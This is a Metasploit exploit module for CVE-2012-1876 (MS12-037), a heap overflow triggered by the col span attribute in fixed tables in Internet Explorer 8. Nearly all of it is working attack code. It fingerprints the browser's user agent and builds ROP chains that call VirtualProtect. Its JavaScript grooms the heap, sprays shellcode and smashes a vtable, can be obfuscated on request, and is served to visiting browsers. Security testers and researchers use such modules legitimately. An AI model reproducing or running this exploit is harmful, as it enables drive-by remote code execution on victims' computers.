Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (MS12-037) (Metasploit)

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:os_name    => OperatingSystems::WINDOWS,
		:ua_minver  => "8.0",
		:ua_maxver  => "8.0",
		:rank       => NormalRanking, # reliable memory corruption
		:javascript => true
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Internet Explorer Fixed Table Col Span Heap Overflow',
			'Description'    => %q{
					This module exploits a heap overflow vulnerability in Internet Explorer caused
				by an incorrect handling of the span attribute for col elements from a fixed table,
				when they are modified dynamically by javascript code.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Alexandre Pelletier',                     # Vulnerability analysis
					'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module
					'binjo',                                   # Metasploit module
					'sinn3r',                                  # Help with the Metasploit module
					'juan'                                     # Help with the Metasploit module
				],
			'References'     =>
				[
					[ 'CVE', '2012-1876' ],
					[ 'OSVDB', '82866'],
					[ 'BID', '53848' ],
					[ 'MSB', 'MS12-037' ],
					[ 'URL', 'http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Payload'        =>
				{
					'Space'         => 1024,
					'BadChars'      => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', {} ],
					[ 'IE 8 on Windows XP SP3 with msvcrt ROP',
						{
							'Rop' => :msvcrt
						}
					],
					[ 'IE 8 on Windows 7 SP1',
						{
							'Rop' => :jre
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jun 12 2012',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
				], self.class)
	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
			return targets[1]  #IE 8 on Windows XP SP3
		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
			return targets[2]  #IE 8 on Windows 7 with JRE
		else
			return nil
		end
	end

	def junk(n=4)
		return rand_text_alpha(n).unpack("V").first
	end

	def nop
		return make_nops(4).unpack("V").first
	end

	def get_payload(t)

		code = payload.encoded

		# Both ROP chains generated by mona.py - See corelan.be
		case t['Rop']
			when :msvcrt
				print_status("Using msvcrt ROP")
				exec_size = code.length
				rop =
					[
						0x77c4ec01, # retn
						0x77c4ec00, # pop ebp; retn
						0x77c15ed5, # xchg eax,esp; retn (pivot)
						0x77c4e392, # pop eax; retn
						0x77c11120, # <- *&VirtualProtect()
						0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn
						junk,
						0x77c2dd6c,
						0x77c4ec00, # pop ebp; retn
						0x77c35459, # ptr to 'push esp; ret'
						0x77c47705, # pop ebx; retn
						exec_size,  # ebx
						0x77c3ea01, # pop ecx; retn
						0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
						0x77c46100, # pop edi; retn
						0x77c46101, # rop nop (-> edi)
						0x77c4d680, # pop edx; retn
						0x00000040, # newProtect (0x40) (-> edx)
						0x77c4e392, # pop eax; retn
						nop,        # nops (-> eax)
						0x77c12df9  # pushad; retn
					].pack("V*")
			when :jre
				print_status("Using JRE ROP")
				exec_size = code.length
				rop =
					[
						0x7c346c0b, # retn
						0x7c36f970, # pop ebp; retn
						0x7c348b05, # xchg eax,esp; retn (pivot)
						0x7c36f970, # pop ebp; retn [MSVCR71.dll]
						0x7c36f970, # skip 4 bytes [MSVCR71.dll]
						0x7c34373a, # pop ebx ; retn [MSVCR71.dll]
						exec_size,  # ebx
						0x7c3444d0, # pop edx ; retn [MSVCR71.dll]
						0x00000040, # 0x00000040-> edx
						0x7c361829, # pop ecx ; retn [MSVCR71.dll]
						0x7c38f036, # &Writable location [MSVCR71.dll]
						0x7c342766, # pop edi ; retn [MSVCR71.dll]
						0x7c346c0b, # retn (rop nop) [MSVCR71.dll]
						0x7c350564, # pop esi ; retn [MSVCR71.dll]
						0x7c3415a2, # jmp [eax] [MSVCR71.dll]
						0x7c3766ff, # pop eax ; retn [MSVCR71.dll]
						0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll]
						0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll]
						0x7c345c30  # ptr to 'push esp; ret ' [MSVCR71.dll]
					].pack("V*")
		end

		code = rop + code
		return code
	end

	def on_request_uri(cli, request)

		agent = request.headers['User-Agent']
		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have the same setup we're targeting
		if my_target.nil?
			print_error("Browser not supported: #{agent}")
			send_not_found(cli)
			return
		end

		js_code =  Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch))

		table_builder = ''

		0.upto(132) do |i|
			table_builder << "<table style=\"table-layout:fixed\" ><col id=\"#{i}\" width=\"41\" span=\"9\" >&nbsp </col></table>"
		end

		# About smash_vtable():
		# * smash the vftable 0x07070024
		# * span => the amount to overwrite
		js_element_id = Rex::Text.rand_text_alpha(4)
		spray_trigger_js = <<-JS

		var dap = "EEEE";
		while ( dap.length < 480 ) dap += dap;

		var padding = "AAAA";
		while ( padding.length < 480 ) padding += padding;

		var filler = "BBBB";
		while ( filler.length < 480 ) filler += filler;

		var arr = new Array();
		var rra = new Array();

		var div_container = document.getElementById("#{js_element_id}");
		div_container.style.cssText = "display:none";

		for (var i=0; i < 500; i+=2) {
			rra[i] = dap.substring(0, (0x100-6)/2);
			arr[i] = padding.substring(0, (0x100-6)/2);
			arr[i+1] = filler.substring(0, (0x100-6)/2);
			var obj = document.createElement("button");
			div_container.appendChild(obj);
		}

		for (var i=200; i<500; i+=2 ) {
			rra[i] = null;
			CollectGarbage();
		}

		function heap_spray(){
			CollectGarbage();

			var shellcode = unescape("#{js_code}");

			while (shellcode.length < 100000)
			shellcode = shellcode + shellcode;
			var onemeg = shellcode.substr(0, 64*1024/2);
			for (i=0; i<14; i++) {
				onemeg += shellcode.substr(0, 64*1024/2);
			}

			onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
			var spray = new Array();

			for (i=0; i<400; i++) {
				spray[i] = onemeg.substr(0, onemeg.length);
			}
		}

		function smash_vtable(){
			var obj_col_0 = document.getElementById("132");
			obj_col_0.width = "1178993";
			obj_col_0.span = "44";
		}

		setTimeout(function(){heap_spray()}, 400);
		setTimeout(function(){smash_vtable()}, 700);
		JS

		if datastore['OBFUSCATE']
			spray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)
			spray_trigger_js.obfuscate
		end

		# build html
		content = <<-HTML
		<html>
		<body>
		<div id="#{js_element_id}"></div>
		#{table_builder}
		<script language='javascript'>
		#{spray_trigger_js}
		</script>
		</body>
		</html>
		HTML

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
	end

end